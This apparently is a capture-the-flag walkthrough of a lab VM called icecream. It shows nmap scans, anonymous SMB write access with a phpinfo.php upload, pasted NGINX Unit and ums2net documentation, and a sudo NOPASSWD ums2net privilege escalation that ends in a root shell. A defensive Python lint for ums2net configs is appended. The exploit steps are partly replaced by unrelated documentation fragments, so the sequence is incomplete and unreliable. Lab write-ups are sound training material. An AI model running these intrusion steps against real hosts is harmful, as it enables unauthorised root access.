```
⚡ root@kali ~ nmap -sP 192.168.56.0/24
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-28 08:06 EST
Nmap scan report for 192.168.56.1
Host is up (0.00061s latency).
MAC Address: 0A:00:27:00:00:09 (Unknown)
Nmap scan report for 192.168.56.2
Host is up (0.00037s latency).
MAC Address: 08:00:27:52:72:FB (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.56.39
Host is up (0.00027s latency).
MAC Address: 08:00:27:11:12:1D (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.56.4
Host is up.
Nmap done: 256 IP addresses (4 hosts up) scanned in 15.11 seconds
```
```
⚡ root@kali ~ nmap -sT -min-rate 10000 -p- 192.168.56.39
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-28 08:08 EST
Nmap scan report for 192.168.56.39
Host is up (0.00042s latency).
Not shown: 65530 closed tcp ports (conn-refused)
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
9000/tcp open  cslistener
MAC Address: 08:00:27:11:12:1D (Oracle VirtualBox virtual NIC)
```
```
⚡ root@kali ~ nmap -script=vuln -p 22,80,139,445,9000 192.168.56.39
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-28 08:14 EST
Pre-scan script results:
| broadcast-avahi-dos:
|   Discovered hosts:
|     224.0.0.251
|   After NULL UDP avahi packet DoS (CVE-2011-1002).
|_  Hosts are all up (not vulnerable).
Nmap scan report for 192.168.56.39
Host is up (0.00037s latency).

PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
9000/tcp open  cslistener
MAC Address: 08:00:27:11:12:1D (Oracle VirtualBox virtual NIC)

Host script results:
|_smb-vuln-ms10-054: false
|_samba-vuln-cve-2012-1182: Could not negotiate a connection:SMB: ERROR: Server returned less data than it was supposed to (one or more fields are missing); aborting [9]
|_smb-vuln-ms10-061: Could not negotiate a connection:SMB: ERROR: Server returned less data than it was supposed to (one or more fields are missing); aborting [9]

Nmap done: 1 IP address (1 host up) scanned in 106.09 seconds
```
```
        Sharename       Type      Comment
        ---------       ----      -------
        print$          Disk      Printer Drivers
        icecream        Disk      tmp Folder
        IPC$            IPC       IPC Service (Samba 4.17.12-Debian)
        nobody          Disk      Home Directories
Reconnecting with SMB1 for workgroup listing.
smbXcli_negprot_smb1_done: No compatible protocol selected by server.
Protocol negotiation to server 192.168.56.39 (for a protocol between LANMAN1 and NT1) failed: NT_STATUS_INVALID_NETWORK_RESPONSE
Unable to connect with SMB1 -- no workgroup available
```
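However, there was no useful data.
Next, let's look at the unfamiliar port 9000. This appears to be NGINX Unit configuration or status information. NGINX Unit is a lightweight application server that supports multiple programming languages (such as Python, PHP, Perl, Ruby, Java, etc.) and can be reconfigured dynamically without restarting the service.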
```
⚡ root@kali ~/Desktop/test/icecream vim phpinfo.php
⚡ root@kali ~/Desktop/test/icecream smbclient //192.168.56.39/icecream -U anonymous
Password for [WORKGROUP\anonymous]:
Try "help" to get a list of possible commands.
smb: \> put phpinfo.php
putting file phpinfo.php as \phpinfo.php (3.9 kb/s) (average 3.9 kb/s)
```
Suppose you saved a PHP script as /www/helloworld/index.php:
```php
<?php echo "Hello, PHP on Unit!"; ?>
```
To run it on Unit with the unit-php module installed, first set up an application object. Let’s store our first config snippet in a file called config.json:
Saving it as a file isn’t necessary, but can come in handy with larger objects.
Now, PUT it into the /config/applications section of Unit’s control API, usually available by default via a Unix domain socket:
```
# curl -X PUT --data-binary @config.json --unix-socket \
       /path/to/control.unit.sock http://localhost/config/applications

{
    "success": "Reconfiguration done."
}
```
Next, reference the app from a listener object in the /config/listeners section of the API. This time, we pass the config snippet straight from the command line:
```
(ice:/home/ice) $ sudo -l
Matching Defaults entries for ice on icecream:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, use_pty

User ice may run the following commands on icecream:
    (ALL) NOPASSWD: /usr/sbin/ums2net
```
Insert the USB Mass Storage. Check /dev/disk/by-id/ for the unique path for that device.
Create a config file based on the above path. Please see the config file format section.
Run “ums2net -c “. ums2net will become a daemon in the background. For debugging, please add the “-d” option to avoid detaching.
Use nc to write your image to the USB Mass Storage device. For example, “nc -N localhost 29543 < warp7.img”
Config file
Each line in the config file maps a TCP port to a device. All the options are separated by spaces. The first argument is a number that represents the TCP port, and the rest of the arguments are in dd style. For example,
```
ice@icecream:/tmp$ sudo su -
sudo su -
/etc/sudoers:2:11: error de sintaxis
with the 'visudo'command as root.
^~~~~~~~
id
uid=0(root) gid=0(root) grupos=0(root)
```
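
A defender-side lint for the ums2net config format described above, as an added example (not code from this write-up or from the ums2net project): it parses each `<port> key=value ...` line and flags write targets outside `/dev/disk/by-id/`, which matters when the binary is reachable through a NOPASSWD sudo rule. It assumes the target is named with a dd-style `of=` option; the sample config and the device name in it are constructed.

```python
import posixpath

# Assumption: only devices addressed through this directory are valid targets,
# following the README step that points at /dev/disk/by-id/.
ALLOWED_PREFIX = "/dev/disk/by-id/"
# Constructed sample config; the device name is a placeholder.
SAMPLE = """\
29543 of=/dev/disk/by-id/usb-EXAMPLE_DISK-0:0 bs=4096
29544 of=/srv/images/out.img
29545 of=/dev/disk/by-id/../../sda bs=4096
http of=/dev/disk/by-id/usb-EXAMPLE_DISK-0:0
"""

def parse_line(line):
    """Split '<tcp-port> key=value ...' into (port, options); None if blank."""
    fields = line.split()
    if not fields:
        return None
    port = fields[0]
    if not (port.isascii() and port.isdigit() and 1 <= int(port) <= 65535):
        raise ValueError(f"invalid TCP port {port!r}")
    options = {}
    for field in fields[1:]:
        key, sep, value = field.partition("=")
        if not (key and sep and value):
            raise ValueError(f"not a dd-style key=value option: {field!r}")
        options[key] = value
    return int(port), options

def audit(config_text):
    """Return (line number, message) for every line that needs review."""
    findings = []
    for lineno, line in enumerate(config_text.splitlines(), 1):
        try:
            parsed = parse_line(line)
        except ValueError as exc:
            findings.append((lineno, str(exc)))
            continue
        if parsed is None:
            continue
        port, options = parsed
        target = options.get("of")  # assumed dd-style name for the output path
        if target is None:
            findings.append((lineno, f"port {port}: no of= target"))
        # Lexical check: normpath collapses '..' but does not follow symlinks.
        elif not posixpath.normpath(target).startswith(ALLOWED_PREFIX):
            findings.append((lineno, f"port {port}: of={target} is outside {ALLOWED_PREFIX}"))
    return findings

if __name__ == "__main__":
    for lineno, message in audit(SAMPLE):
        print(f"line {lineno}: {message}")
```

Because the path check is lexical, a symlink placed under the allowed directory still passes; resolve targets on the host itself if that is in scope.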